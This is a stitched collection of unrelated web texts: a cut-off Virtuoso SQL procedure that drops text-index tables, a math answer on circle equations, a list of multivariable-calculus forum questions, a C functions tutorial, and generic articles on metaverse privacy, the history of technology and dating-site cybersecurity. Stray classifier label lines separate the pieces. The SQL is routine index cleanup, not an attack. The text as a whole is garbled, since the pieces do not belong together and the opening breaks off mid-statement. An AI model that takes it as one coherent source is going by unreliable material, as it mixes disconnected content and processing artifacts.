"%I"."%I"."TT_QUERY_WORD_%I"',tbn0, tbn1, tbn2); DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('DROP PROCEDURE "%I"."%I"."TT_NOTIFY_%I"',tbn0, tbn1, tbn2); DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('DROP TABLE "%I"."%I"."%I"', tbn0, tbn1, concat (tbn2, '_', dbcol,'_QUERY')); DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('DROP TABLE "%I"."%I"."%I"', tbn0, tbn1, concat (tbn2, '_', dbcol, '_USER')); DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('DROP TABLE "%I"."%I"."%I"', tbn0, tbn1, concat (tbn2, '_', dbcol, '_HIT')); -- make an empty procedure DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('create procedure "%I"."%I"."VT_HITS_%I" (inout vtb any, inout strs any) { return; }', tbn0, tbn1, tbn2 ); DB.DBA.execstmt (stmt, stat, msg); delete from DB.DBA.SYS_SCHEDULED_EVENT where SE_NAME = sprintf ('Notification for text hits on "%s.%s.%s"', tbn0, tbn1, tbn2); return; } ; --#IF VER=5 --!AFTER --#ENDIF grant execute on DB.DBA.vt_create_text_index to public ;
__label__pos
0.549881
Welcome :: Homework Help and Answers :: Mathskey.com Welcome to Mathskey.com Question & Answers Community. Ask any math/science homework question and receive answers from other members of the community. 13,434 questions 17,804 answers 1,438 comments 59,225 users Standard and General Form of the Circle's Equation? +3 votes Standard and General Form of the Circle's Equation? Write the standard form of the equation and the general form of the equation of each circle of radius r and center (h, k). (1) r = 3; (h, k) = (0, 0 ) (2) r = 5; (h, k) = (-5, 2) asked Jan 16, 2013 in ALGEBRA 1 by homeworkhelp Mentor 1 Answer +5 votes   Best answer (1) r = 3; (h, k) = (0, 0 ) General Form equation is x2 + y2 – 2hx – 2ky + h2 + k2 – r2 = 0, where (h, k) is the centre and r, the radius. x2 + y2 + 2(0)x – 2(0)y + 02 + 02 – 32 = 0 x2 + y2 – 32 = 0 x2 + y2 – 9 = 0 Standard Form Equation is (x – h)2 + (y – k)2 = r2 where (h, k) is the centre and r, the radius. (x – 0) 2 + (y – 0) 2 = 32 x2 + y2 = 9 . 2) r = 5; (h, k) = (-5, 2) General Form equation is x2 + y2 – 2hx – 2ky + h2 + k2 – r2 = 0, where (h, k) is the centre and r, the radius. x2 + y2 –2(–5)x – 2(2)y + (–5)2 + 22 – 52 = 0 x2 + y2 + 10x – 4y + 25 + 4 – 25 = 0 x2 + y2 + 10x – 4y + 4 = 0 Standard Form Equation is (x – h)2 + (y – k)2 = r2 where (h, k) is the centre and r, the radius. (x – (–5)) 2 + (y–2)2 = 52 (x + 5)2 + (y – 2)2 = 25   source: http://answers.yahoo.com/question/index?qid=20071125073022AADwDqu answered Jan 16, 2013 by Naren Answers Apprentice selected Jan 23, 2013 by homeworkhelp Thank you!!! it helped a lot... Related questions ...
__label__pos
0.975044
Navigating Privacy and Security Concerns in Metaverse Apps The rise of metaverse apps has ushered in a new era of virtual experiences and interactions. From gaming to socializing, these immersive platforms offer endless possibilities. However, with this new frontier comes a set of privacy and security concerns that users must navigate. In this article, we will explore the key issues surrounding privacy and security in metaverse apps and provide insights on how users can protect themselves. Understanding Data Collection Practices Metaverse apps often require users to create accounts and provide personal information. This data is collected for various purposes, such as user authentication, customization of virtual avatars, or targeted advertising. It is crucial for users to understand what data is being collected and how it will be used. To ensure transparency, metaverse app developers should provide clear privacy policies that outline their data collection practices. Users should take the time to read these policies carefully before signing up or using the app. Additionally, it is advisable to choose apps that have a good track record of handling user data responsibly. Safeguarding Personal Information Protecting personal information is paramount when using metaverse apps. Users should be cautious about sharing sensitive data such as their full name, address, or financial information within these platforms unless absolutely necessary. One way to safeguard personal information is by utilizing strong passwords for metaverse app accounts and enabling two-factor authentication whenever possible. This adds an extra layer of security by requiring users to verify their identity through another device or method. Furthermore, it is essential to regularly update the metaverse app to ensure that any security vulnerabilities are patched promptly. Staying vigilant against phishing attempts or suspicious links within the app can also help prevent unauthorized access to personal information. Managing Social Interactions Metaverse apps thrive on social interactions between users, but this also opens up opportunities for potential privacy breaches or cyberbullying. Users should be mindful of the information they share with others and be cautious about accepting friend requests or engaging in private conversations with unknown individuals. Most metaverse apps provide privacy settings that allow users to customize who can see their profile, interact with them, or access their personal information. Reviewing and adjusting these settings regularly can help users maintain control over their privacy within the virtual world. In cases where inappropriate behavior or harassment occurs, users should report the incident to the app’s support team immediately. Metaverse app developers have a responsibility to address such issues promptly and take appropriate actions against offenders. Staying Informed about App Updates Metaverse apps are continuously evolving, which means that privacy and security concerns may arise as new features are introduced. It is essential for users to stay informed about app updates, especially those related to privacy and security enhancements. Following official announcements from the app developer or joining user communities where updates are shared can provide valuable insights into any changes that may affect user privacy. By staying up-to-date, users can take proactive measures to protect themselves and adjust their privacy settings accordingly. In conclusion, while metaverse apps offer exciting virtual experiences, it is crucial for users to navigate privacy and security concerns effectively. Understanding data collection practices, safeguarding personal information, managing social interactions, and staying informed about app updates are key steps towards ensuring a safe and secure metaverse experience. By taking these precautions, users can enjoy all that the metaverse has to offer while protecting their digital identities. This text was generated using a large language model, and select text has been reviewed and moderated for purposes such as readability.
__label__pos
0.910978
Use this tag for questions about differential and integral calculus with more than one independent variable. Some related tags are (differential-geometry), (real-analysis), and (differential-equations). learn more… | top users | synonyms 4 votes 0answers 107 views closed form is exact in euclidean space Question is to show that $d(f)=0$ for a $0$ form on $\mathbb{R}^n$ then $f$ is a constant function. See that $$0=df=\sum_i\frac{\partial f}{\partial x_i}dx_i$$ implies that $\frac{\partial ... 2 votes 1answer 14 views Tangent space of manifold has two unit vectors orthogonal to tangent space of its boundary I'm reading spivak calculus on manifolds and got stuck. Let M be a k-dimensional manifold with boundary in $\mathbb{R^{n}}$, and $M_{x}$ is the tangent space of M at x with dimension k, then $\partial ... 1 vote 1answer 33 views How to interpret a mapping in $\mathbb{R}^{2}$ So I am trying to find the image of the circle $(x-1)^{2} + y^{2} = 1$ under the mapping $F$ defined by $$(u,v) = F(x,y) = \bigg(\frac{1}{2}(x+y), \frac{1}{2}(-x+y)\bigg)$$ Using computational ... 1 vote 2answers 51 views Notation in Vector calculus, Stokes' theorem I have a question regarding Stokes' theorem: $$\oint_c \vec{F} \, d\vec{r} = \iint_S \nabla \times \vec F({r}(u,v)) \cdot d\vec S = \iint_S \nabla \times \vec F({r}(u,v)) \cdot (r_u \times r_v)\, ... 2 votes 2answers 36 views How to find cartesian coordinate of velocity of particle on the trajectory, $Ax^2 +2Bxy +Cy^2=1, A,B,C >0.$ Consider a particle with constant speed $|w|=w_o$ moving on trajectory $Ax^2 +2Bxy +Cy^2=1, A,B,C >0.$ Could anyone advise me how to express cartesian coordinates of $v$ in terms of $x$ and $y \ ?$ ... 1 vote 1answer 23 views Counter Example Problem ( Two variable function ). In the given situation we show that , either the statement is true or we find a counter example to prove it wrong , If $\lim_{y \to 0} f(0,y)=0$ , then , $\lim_{(x,y) \to (0,0)} f(x,y)=0$ I ... 1 vote 2answers 23 views Limits (Three Variable function). We're given : $f(x,y,z) = \dfrac{xyz}{x^{2}+y^{2}+z^{2}}$ , Also , it's given that $\lim_{(x,y,z) \to (0,0,0)} f(x,y,z)$ exists. We need to prove that $\lim_{(x,y,z) \to (0,0,0)} f(x,y,z) = 0$. ... 0 votes 0answers 24 views Finding Limits of Integration: Developing Intution I am having trouble finding limits of integration in Multivariable Calculus. My question is that is there a way to find these bounds without graphing. I'm just not able to understand how to find these ... 1 vote 1answer 37 views Extending a smooth function of constant rank Let's denote $\mathbb{H}^m = \{(x_1, \ldots, x_m) \in \mathbb{R}^m\ |\ x_m \geq 0\}$. For an open subset $U \subset \mathbb{H}^m$, a function $f : U \to \mathbb{R}^n$ is called smooth if it can be ... 1 vote 1answer 30 views Integration By Parts on a Fourier Transform I'm having trouble with the "An integration by parts in $x$ for the first summand...and the assumption that $\phi$ goes to $0$ as $|x|\to\infty$." I tried the integration by parts but ended up with ... 5 votes 0answers 51 views Continuity ( Functions of 2 variables ). Given , $$ f(x,y) = \begin{cases} \dfrac{xy^{3}}{x^{2}+y^{6}} & (x,y)\neq(0,0) \\ 0 & (x,y)=(0,0) \\ \end{cases} $$ We need to check whether the function is continuous at ... 2 votes 1answer 38 views Non linear system of differential equations Is there a specific name to the following type of non linear ODEs $\begin{array}{c} \dot{x}_1 &= c_1 \, x_2\, x_3 \\ \dot{x}_2 &= \, c_2 x_1 x_3 \\ \dot{x}_3 &= c_3 \, x_2 x_1 ... 4 votes 2answers 170 views Minimum of an apparently harmless function of two variables I would like to prove that the minimum of the function $$ f(x,y):=\frac{(1-\cos(\pi x))(1-\cos (\pi y))\sqrt{x^2+y^2}}{x^2 y^2 \sqrt{(1-\cos(\pi x))(2+\cos(\pi y))+(2+\cos(\pi x))(1-\cos(\pi y))}} $$ ... 2 votes 1answer 27 views Finding the net outward flux of a sphere Use the Divergence Theorem to compute the net outward flux of: $$ F = \langle x^2, y^2, z^2 \rangle $$ $S$ is the sphere: $$ \{(x,y,z): x^2 + y^2 + z^2 = 25\} $$ First, I took: $$ \nabla \cdot F ... 0 votes 1answer 30 views How do you go about solving partial differential equations for finding critical points in general optimization problems? I was reading about partial second derivative test for optimization problems and I came across the example here. I saw the equations have yielded four critical points, but I wasn't able to find those ... 0 votes 0answers 53 views Partial derivative of recursive exponential $f(x) = \sum^{K_2}_{k_2=1}c_{k_2} \exp(-z^{(2)}_{k2})$ with respect to the deepest parameter I was trying to take the derivative of the following equation (which can be depicted nicely in a tree like structure, look at the end of question for diagram): $$f(x) = f([x_1, ..., x_{N_p}])= ... 0 votes 2answers 28 views Is the funtion $f(x,y)=\frac {x^2y^2}{x^2y^2 + (y-x)^2}$ when $(x,y)\neq (0,0)$ and $f((0,0))=0$ continuous at $(0,0)$ and is this differentiable? Is the function $$f(x,y)=\begin{cases}\frac {x^2y^2}{x^2y^2 + (y-x)^2} & \text{ , when } (x,y)\not=(0,0)\\0&\text{ , when }(x,y)=(0,0)\end{cases}$$ continuous at $(0,0)$ is this ... 0 votes 1answer 34 views Conditions on a linear system of ODEs Let $x:[0,T]\to\mathbb{R}^n$ and $y:[0,T]\to\mathbb{R}^n$ be solutions to an $n\times n$ system of linear ODEs. That is, $$\frac{dx}{dt}=A(t)x+b(t) \mbox{ and } \frac{dy}{dt}=A(t)y+b(t) \mbox{ for } ... 1 vote 1answer 64 views Finding $\iint_S {z \:ds}$ for some $S$ $$\iint_S {z \:ds}$$ In this double integral above, $S$ is the part of a sphere, $x^2+y^2+z^2=1$, which lies above the cone, $z=\sqrt{x^2+y^2}$. How can I calculate the above double integral. Can ... 3 votes 1answer 68 views Using Stokes' Theorem Finding $\int_C{F\bullet dr}$ Suppose that $C$ is the intersection of $z=2x+5y$ and $x^2+y^2=1$ which is oriented counterclockwise when viewed from above. Now let $$F=\langle \sin{x}+y, \sin{y}+z, \sin{z}+x \rangle$$ How can I ... 0 votes 1answer 52 views Proper definition use in Stoke's theorem Let the curve C be a piecewise smooth and simple closed curve enclosing a region, D. Some sources asserts Stoke's theorem to be: $$\oint_{C} F.dr = \iint_{R}\nabla \times FdS$$ Whereas, some claims ... 1 vote 3answers 60 views How to sketch a surface in a three-dimensional space? I was asked to hand sketch the surface defined by $$x^2+y^2-z^2=1$$ How could I do that? I find it particularly hard to draw graph in three-dimension, could you give me some advice? 0 votes 1answer 38 views differential forms question. [closed] Let $ f: \mathbb{R^3} \to \mathbb{R}$ be the function $f(x, y, z) = x^2 + y^2 + z^2$ and let $F : \mathbb{R^2} \to \mathbb{R^3}$ be the map $$F(u,v)= \big( ... 0 votes 1answer 43 views Differentiability of $\frac{x^2y^2}{x^2+y^4}$ at $(0,0)$ [closed] Given function, $f$ defined: $f(x,y)=\frac{x^2y^2}{x^2+y^4}$ if $(x,y)\ne (0,0)$ and $f(0,0)=0$ Prove that $f(x,y)$ is not differentiable at $(0,0).$ 1 vote 0answers 64 views Path continuous but not continuous [closed] Find an example of function $f : \mathbb{R}^2 \to \mathbb{R}$ such that $f$ is continuous along every path but $f$ is not continuous. 0 votes 1answer 21 views Finding the derivative of a multivariable function Suppose $f: \mathbb{R}^n \to \mathbb{R}$ is a differentiable function. Then we can write the derivative of $f$ as a $1 \times n$ row matrix of partial derivatives of $f$ ,i,e, ... 1 vote 2answers 66 views how to differentiate $y(x) =exp(ax)$ twice I'm quite confused with this differentiation: Suppose $x$ is a $m \times 1$ column vector, $a$ is a $1 \times m$ vector, I want to differentiate $\exp(ax)$ a few times. I think the first derivative ... 2 votes 2answers 46 views does simply connectedness require connectedness? My question consists of two parts. $1)$ suppose domain $D=\{(x,y)\in\mathbb R^2~|~xy>0\}$ is given. Now that is first quadrant and third quadrant with exclusion of $x$ and $y$ axis. We can easily ... 0 votes 1answer 19 views Relationship between two variables with min and max value (please read inside) [closed] Hi and sorry for the bad title. I do some programming for games and often run into the following practical problem: I have two values that run within certain limits, let's call them xMin, xMax, yMin ... 1 vote 1answer 23 views $F = \langle yz-2xy^2, axz-2x^2y+z, xy+y \rangle$ [duplicate] Given that: $$F = \langle yz-2xy^2, axz-2x^2y+z, xy+y \rangle$$ in which $a$ is some constant. Now, for what $a$ would make the vector field of $F$ conservative? How can we find an $f$ with $\nabla ... 0 votes 0answers 23 views How to find out if point is local Maximizer or local Minimizer ? Lagrangian is given The Lagrangian is: $L(x,\lambda) = x_1x_2-2x_1-\lambda (x_1^2-x_2^2)$ Taking the derivatives and setting it equal to zero gives: $x_2-2\lambda x_1-2=0$ $x_1+2\lambda x_2=0$ $x_1^2-x_2^2=0$ The ... 0 votes 4answers 49 views Length of Spiral in a plane [closed] Problem Take a positive constant real number $c$. Draw a rough sketch and find the length of the spiral in the plane given by $(x(t),y(t))=(e^{-ct}\cos(t),e^{-ct}\sin(t))$ for $0\leq t<\infty$. ... 0 votes 2answers 142 views Math Subject GRE 1268 Problem 64 Flux of Vector Field What is the value of the flux of the vector field F, defined on $R^3$ by $F(x,y,z) = (x,y,z)$ through the surface $z=\sqrt{1-x^2-y^2}$ oriented with upward-pointing normal vector field? ... 2 votes 5answers 42 views Finding a general solution to a differential equation, using the integration factor method Use the method of integrating factor to solve the linear ODE $$ y' + 2xy = e^{−x^2}.$$ And verify your answer I can solve the ODE as a linear equation (mulitply both sides, subsititute, reverse ... 1 vote 1answer 51 views Multivariable Calculus: Manifolds Problem Let $M$ be the set of all points $(x,y) \in \mathbb{R}^2$ satisfying the equation $$xy^3 + \frac{x^4}{4} + \frac{y^4}{4} = 1 $$ Prove that $M$ is a manifold. What is the dimension of $M$? ... 1 vote 1answer 43 views Good reference on higher dimensional derivatives? I've spent several months now periodically scouring the internet for a comprehensive overview of an introduction to higher dimensional derivatives. I've already read baby Rudin's section on the ... 1 vote 1answer 39 views Surface integral on unit circle Let $S$ be the unit sphere in $\mathbb{R}^3$ and write $F(x)=\nabla V(x)$ where $V(x)=1/|x|$ Evaluate $$\iint_S F\cdot n dS$$ Without using divergence theorem, we can evaluate it straightforwardly, ... 2 votes 1answer 25 views Let $f$ be differentiable at every point of some open ball $B(a)$ in $\mathbb R^n$ and $f(x)\le f(a) , \forall x \in B(a)$ , then prove $D_k f(a)=0$. If $f:\mathbb R^n \to \mathbb R$ is a function differentiable at every point of some open ball $B(a)$ with center $a\in \mathbb R^n$ and $f(x)\le f(a) , \forall x \in B(a)$ , then how to show that all ... 0 votes 2answers 19 views $f'(x;y)=0$ for every $x$ in an open convex set and for every vector $y$ ; then to show $f$ is constant on $S$ Let $f:\mathbb R^n \to \mathbb R$ be a map , $S$ be an open convex set in $\mathbb R^n$ such that for every $x \in S$ and $y \in \mathbb R^n$ , $f'(x;y)$ exists and equals $0$ ; then how to show that ... 1 vote 3answers 55 views Substitution to solve an initial value problem By using the substitution $y(x) = v(x)x$, how can I solve the initial value problem $$ \frac{dy}{dx} = \frac{x^2+y^2}{xy - x^2},\quad y(1)=1 $$ And also keep my answer in the form $g(x,y)= 4e^{-1} ... 1 vote 1answer 32 views Diffeomorphism between Euclidean space How does one show that if $f:U\rightarrow V$ is a diffeomorphism between open sets $U\subset\mathbb{R}^m$ and $V\subset\mathbb{R}^n$ then $m=n$? Here is some working: For $u\in U$ let $v=f(u)\in V$. ... 1 vote 0answers 37 views Application of Stoke's Theorem Edit: I think I misunderstood the problem. Upon reading my textbook again, I think what they mean by $F(x,y,z)=<yz,2xz,e^{xy}>$ ; C is the circle $x^2+y^2=16, z=5$ is just literally a ... 0 votes 1answer 36 views Stokes' Theorem - The normal vector Stokes' theorem says: $$\oint_cFdr = \int\int_S curl F dS = \int\int_S curl F \cdot n \, dS$$ Where $F$ is a vector field on $\mathbb{R}^3$. My question is what do I take $n$ to be? If we ... 1 vote 1answer 45 views Absolute Min and Max of $f(x, y)=x^2+4y^2-2x^2y+4$ Using Partial Derivatives Consider this problem: Find the absolute minimum and absolute maximum of $f(x, y)=x^2+4y^2-2x^2y+4$ on the rectangle given by $-1\leq x\leq1$ and $-1\leq y\leq1$ I solved this problem using ... 0 votes 2answers 42 views If a vector field is conservative then is it path independent? I am studying vector calculus and I am having trouble with the idea of path independence. Is it necessarily true that if $F=(P,Q)$ (a vector field in $\Bbb R^2$) is conservative, then $\oint \limits ... 2 votes 2answers 92 views Vector Field Conceptual Question Given that: $$F = \langle yz-2xy^2, axz-2x^2y+z, xy+y \rangle$$ in which $a$ is some constant. Now, for what $a$ would make the vector field of $F$ conservative? Why is there only one, or are there ... 1 vote 0answers 47 views Under what conditions is this true: $\lim_{r \to 0} \frac{1}{r} \int_{0}^{2\pi} f(r,x) dx = 2\pi f(0,0)$ I will like to know under what hypothesis the following is true, and maybe a sketch of the proof. I saw it in a solution of an exercise. In this exercise, $f$ was harmonic, but I don't know if that is ... 1 vote 2answers 84 views Evaluating Line Integrals using Green's Theorem I am currently learning about Green's Theorem, Curl and Divergence, and I came across a problem: Given a two dimensional vector field: $$ F=\langle e^{\sin{x}}+y^2, x^2+y^2 \rangle$$ And then I am ... 1 vote 1answer 26 views Does given point satisfy FONC? minimize $4x_1^2+2x_2^2-4x_1x_2-8x_2$ subject to $x_1+x_2\leq 4$ Does the point $(2,2)$ satisfy the FONC for a local minimizer? The gradient of the objective function is $\nabla f = ... 1 vote 2answers 17 views Div$f$ is invariant under an orthogonal change of coordinates Let $f: \mathbb{R^n} \to \mathbb{R^n}$ and $Df$ exists. I need to show that div$f$ is invariant under an orthogonal change of coordinates. Let $T:\mathbb{R^n} \to \mathbb{R^n}$ be an orthogonal ...
__label__pos
0.996611
The Evolution of Technology: A Catalyst for Modernization and Progress Technology, often abbreviated as “tec,” has rapidly evolved over the years, revolutionizing the way we live, work, and communicate. The impact of technology on society is profound, transforming every aspect of our lives and driving progress at an unprecedented pace. From early inventions like the wheel to contemporary innovations like artificial intelligence, technology has been a cornerstone of human evolution. Early Technological Milestones The journey of technology began thousands of years ago with simple tools crafted from stone, bone, and wood. The advent of the wheel around 3500 BC marked a significant milestone, facilitating transportation and trade. As civilizations grew, so did technological ingenuity. The ancient Greeks and Romans developed advanced engineering techniques, contributing to the construction of remarkable architectural marvels like the Parthenon and the Colosseum. The Renaissance and the Birth of Modern Science The Renaissance, occurring from the 14th to the 17th century, was a period of immense cultural and intellectual growth. This era witnessed the blossoming of modern science and technology. Inventors and thinkers like Leonardo da Vinci conceptualized designs for machines and devices that were far ahead of their time. The printing press, invented by Johannes Gutenberg, revolutionized the spread of knowledge by making books more accessible. The Industrial Revolution: A Technological Turning Point The Industrial Revolution, which began in the late 18th century and continued into the 19th century, was a watershed moment in technological history. It brought about mechanization, steam power, and mass production, transforming the economic and social landscape. Factories, powered by steam engines, mechanized agriculture, manufacturing, and transportation, boosting efficiency and productivity. The Digital Age and the Internet Revolution The late 20th century saw the emergence of the digital age, characterized by rapid advancements in computing, telecommunications, and the birth of the internet. Computers became smaller, faster, and more accessible, enabling a myriad of applications, from business operations to scientific research. The internet revolutionized communication, connecting people worldwide and providing a platform for information exchange and collaboration. Contemporary Advancements: Artificial Intelligence and Beyond In the 21st century, technology has continued to advance at an unprecedented rate. Artificial intelligence (AI) has become a focal point, with machine learning algorithms and deep learning driving breakthroughs in various fields. AI is powering autonomous vehicles, improving healthcare through diagnostics and personalized medicine, and enhancing our understanding of complex systems. The Impact of Technology on Society The impact of technology on society cannot be overstated. It has improved the quality of life, made tasks more efficient, and connected people globally. However, it also raises ethical, social, and environmental concerns. Issues such as data privacy, job displacement due to automation, and the digital divide are important challenges that need to be addressed as technology continues to evolve. Looking Ahead: A Technological Future As we look to the future, the trajectory of technology seems promising. Emerging technologies like quantum computing, renewable energy solutions, and bioengineering hold immense potential to address pressing global challenges. However, responsible development and deployment of technology are crucial to ensure a sustainable and equitable future for all. In conclusion, technology, abbreviated as “tec,” has evolved from simple tools to complex systems that have shaped our world. Its impact on society and its potential for the future are immense, and it’s essential to harness this power responsibly for the benefit of humanity and the planet. Leave a Comment
__label__pos
0.999486
Functions in C with Examples This Tutorial Explains Functions in C with Example(s). What is Function in C? A function is a block of code that performs a specific task. Functions are often used to perform similar tasks on different data sets. There are two types of functions in C, user-defined functions and library functions. • User-defined functions are the functions which are written by the user and included in the program. • Library functions are the inbuilt functions which are already present in the C library (like printf(), scanf() etc). General Syntax of a C Function: type function_name(formal_arguments) /* function definition header */ { statements; /*function body*/ return statement; } Like variables, every function also has a type, meaning that what type of value function returns to its calling function. For example, if function returns an integer, it is of type int; if it returns a float, it is of type float; and so on. Remember that if a function returns nothing to its calling function, its type is void. The function name should be descriptive, stating clearly what the specific task function does. The function name is followed by a pair of parenthesis, within which specify a comma separated list of arguments with their number and types in the order corresponding to arguments from its calling function, and use void if the function does not take any arguments. The function header contains the function type, function name, and any arguments in parenthesis. The function header is immediately followed by a pair of braces containing instructions on how the function performs a specific task. advertisement advertisement Let’s look at an example now. #include <stdio.h> void display(void); /* function declaration */   int main(void) { printf("main: going to call display...\n"); display(); /* call to display() */ return 0; }   void display(void) { printf("i am display(): I display massage!\n"); return; } When a function returns nothing i.e. function is of type void, we can use return statement as ‘return;’ i.e. return keyword is not followed by any value. Let’s take one more example, Sanfoundry Certification Contest of the Month is Live. 100+ Subjects. Participate Now! /* sum2ints.c -- program sums up two integers */ #include <stdio.h> int sum2ints(int, int); /* declaration or function prototype */   int main(void) { int u = 5, v = 10;   printf("sum of %d and %d is %d\n", u, v, sum2ints(u, v)); return 0; }   /* sum2ints() sums up two integers and returns their sum to calling fun. */ int sum2ints(int x, int y) /* x, y are formal arguments */ { return x + y; } Here’s output, sum of 5 and 10 is 15 In the above program, function sum2ints() takes two integers, sum them up and return their sum to calling function to be displayed to the user. advertisement Example 2: One of the most basic function types is the mathematical function. These functions take one or more numeric arguments and perform a calculation on them, returning a numeric result. For example, the sqrt() function takes a single argument (the number to be square-rooted) and returns its square root: #include <stdio.h> #include <math.h>   int main(void) { double num = 25; double root = sqrt(num); //root will be 5.0   printf("The square root of %f is %f\n", num, root);   return 0; } Output: The square root of 25.000000 is 5.000000 Another common type of function in C is string function. These functions operate on null-terminated strings (arrays of characters) and usually take two arguments: the first is the string to be operated on, and the second is an integer specifying the maximum length of the resulting string (including the null terminator). advertisement Advantage of Functions in C: • Functions can be written once and then reused in other parts of the program without having to be rewritten. This makes code more reliable and easier to read and maintain. • Functions can make code more modular. Modular code is easier to understand and debug because it is divided into smaller, more manageable pieces. • Functions can promote code reuse and portability. Code that is written in a modular fashion using functions can be easily reused in other programs or ported to other platforms with minimal changes. • It will improve the quality and performance by reducing the amount of code that needs to be executed. Sanfoundry Global Education & Learning Series – 1000 C Tutorials. If you wish to look at all C Tutorials, go to C Tutorials. If you find any mistake above, kindly email to [email protected] advertisement advertisement Subscribe to our Newsletters (Subject-wise). Participate in the Sanfoundry Certification contest to get free Certificate of Merit. Join our social networks below and stay updated with latest contests, videos, internships and jobs! Youtube | Telegram | LinkedIn | Instagram | Facebook | Twitter | Pinterest Manish Bhojasia - Founder & CTO at Sanfoundry Manish Bhojasia, a technology veteran with 20+ years @ Cisco & Wipro, is Founder and CTO at Sanfoundry. He lives in Bangalore, and focuses on development of Linux Kernel, SAN Technologies, Advanced C, Data Structures & Alogrithms. Stay connected with him at LinkedIn. Subscribe to his free Masterclasses at Youtube & discussions at Telegram SanfoundryClasses.
__label__pos
0.866482
• Home • / • Blog • / • Lifestyle • / • How Cybersecurity Measures Protect Your Data on Online Dating Sites Published on February 8, 2024 How Cybersecurity Measures Protect Your Data on Online Dating Sites In an era where online interactions shape our social landscape, online dating sites have become integral platforms for meeting potential partners. As the digital romance landscape expands, the importance of cybersecurity measures cannot be overstated.  This deep dive explores the ways in which top dating websites prioritize cybersecurity to safeguard user data, ensuring a secure and enjoyable experience for individuals seeking love in the digital realm. 1. The Pervasive Nature of Online Dating: Online dating has transcended societal norms to become a mainstream avenue for meeting romantic partners. Top dating websites have witnessed a surge in user registrations, reflecting the increasing reliance on these platforms to connect with like-minded individuals in an ever-connected world. 2. The Goldmine of Personal Information: While online dating provides a convenient way to meet potential partners, it also involves sharing personal information. From profiles detailing interests and preferences to private messages exchanged between users, the digital realm becomes a goldmine of personal data, making cybersecurity paramount. 3. Encryption: The First Line of Defense: Top dating websites prioritize the use of encryption to secure the transmission of data between users and the platform. Encryption protocols, such as SSL (Secure Sockets Layer) and TLS (Transport Layer Security), ensure that sensitive information, including login credentials and private messages, remains unreadable to unauthorized parties. 4. Robust Authentication Processes: Defending Against Unauthorized Access: Ensuring that only authorized users access their accounts is a fundamental aspect of cybersecurity in online dating. Top dating websites implement robust authentication processes, including secure login mechanisms and, in some cases, two-factor authentication (2FA), adding an extra layer of protection against unauthorized access. 5. Data Privacy Policies: Establishing Trust through Transparency: Transparent data privacy policies are a hallmark of top dating websites committed to cybersecurity. These policies outline how user data is collected, stored, and used. By providing clear and accessible information, dating platforms build trust with users, who can make informed decisions about sharing their personal information. 6. Regular Security Audits: Proactive Measures for Continuous Protection: Top dating websites conduct regular security audits to identify vulnerabilities and ensure ongoing compliance with cybersecurity best practices. These audits may be performed by internal security teams or third-party cybersecurity firms, contributing to the continuous improvement of the platform’s security posture. 7. Scam and Fraud Prevention: Mitigating Risks in the Digital Dating Landscape: The digital dating landscape is not without risks, including scams and fraudulent activities. Top dating websites implement measures to detect and prevent scams, using advanced algorithms and machine learning to identify suspicious behavior. This proactive approach helps protect users from falling victim to fraudulent schemes. 8. Secure Payment Processing: Safeguarding Financial Transactions: For dating platforms that offer premium or subscription-based services, secure payment processing is crucial. Top dating websites integrate trusted payment gateways with encryption to protect users’ financial information during transactions. This ensures that payment details remain confidential and secure. 9. Educating Users on Cybersecurity Practices: Empowering the Digital Daters: Empowering users with knowledge about cybersecurity practices is a shared responsibility. Top dating websites often provide educational resources and tips on safe online dating. This may include guidance on creating strong passwords, recognizing and reporting suspicious activities, and practicing caution when sharing personal information. 10. Addressing Geolocation Privacy Concerns: Balancing Convenience and Safety: Geolocation features in dating apps enhance the user experience by connecting individuals based on proximity. However, top dating websites must strike a balance between convenience and safety. Robust cybersecurity measures are implemented to protect the privacy of users’ location data, ensuring that it is shared securely and with user consent. 11. Artificial Intelligence (AI) for User Safety: Enhancing Threat Detection: Top dating websites leverage artificial intelligence (AI) to enhance user safety. AI algorithms analyze user behavior patterns to detect anomalies that may indicate fraudulent activities or potential security threats. This proactive use of AI contributes to a safer online dating environment. 12. Incident Response Plans: Swift Action in the Face of Security Incidents: Despite preventive measures, security incidents may still occur. Top dating websites have well-defined incident response plans in place to ensure swift and effective action in the event of a security breach. This includes communication strategies, user notifications, and steps taken to mitigate the impact on user data. 13. User Reporting Mechanisms: Empowering Users to Contribute to Safety: Empowering users to play an active role in cybersecurity is integral. Top dating websites provide user-friendly reporting mechanisms that allow individuals to flag suspicious profiles or activities. This collaborative effort enhances the platform’s ability to identify and address potential security threats. 14. Regulatory Compliance: Navigating Legal Frameworks for User Protection: Top dating websites operate within legal frameworks that mandate data protection and user privacy. Compliance with regulations, such as the General Data Protection Regulation (GDPR), underscores the commitment of these platforms to prioritize user protection and adhere to international cybersecurity standards. 15. Transparent Communication: Building Trust in the Digital Dating Space: Transparent communication is a cornerstone of cybersecurity in online dating. Top dating websites prioritize open and clear communication with users, keeping them informed about security measures, updates, and any potential risks. This transparency fosters trust and reinforces the platform’s commitment to user safety. Conclusion: The Ever-Evolving Landscape of Cybersecurity in Online Dating: As online dating continues to evolve, so does the cybersecurity landscape within the digital romance realm. Top dating websites recognize the responsibility to protect user data and prioritize implementing robust cybersecurity measures.  The intersection of entertainment and cybersecurity in online dating reflects a commitment to creating a secure, enjoyable, and trustworthy environment for individuals seeking love in the digital age.  As technology advances, so will the innovative cybersecurity strategies employed by top dating websites, ensuring that the quest for love remains exciting and secure in the ever-expanding digital realm. You may also like May 24, 2024 The Role of Pets in Enhancing Life at Residential Care Facilities May 24, 2024 Navigating Life Insurance for Cancer Patients: A Comprehensive Guide May 24, 2024 Why Core and Pelvic Floor Health is Crucial to Women’s Wellbeing May 24, 2024 Considerations to Make When Choosing the Right Hiking Boots May 24, 2024 Stress and Nutrition: How a Balanced Diet Can Help You Cope May 24, 2024 To Stand Out In Any Room In The US – You Need The Following Clothes Tips In 2024 May 23, 2024 Leveraging Technology for Success: Day Trading in the Digital Age May 23, 2024 Financial Security in the Digital Age: Protecting Your Online Assets May 23, 2024 Your Money, Your Future: The Importance of Financial Literacy
__label__pos
0.924595
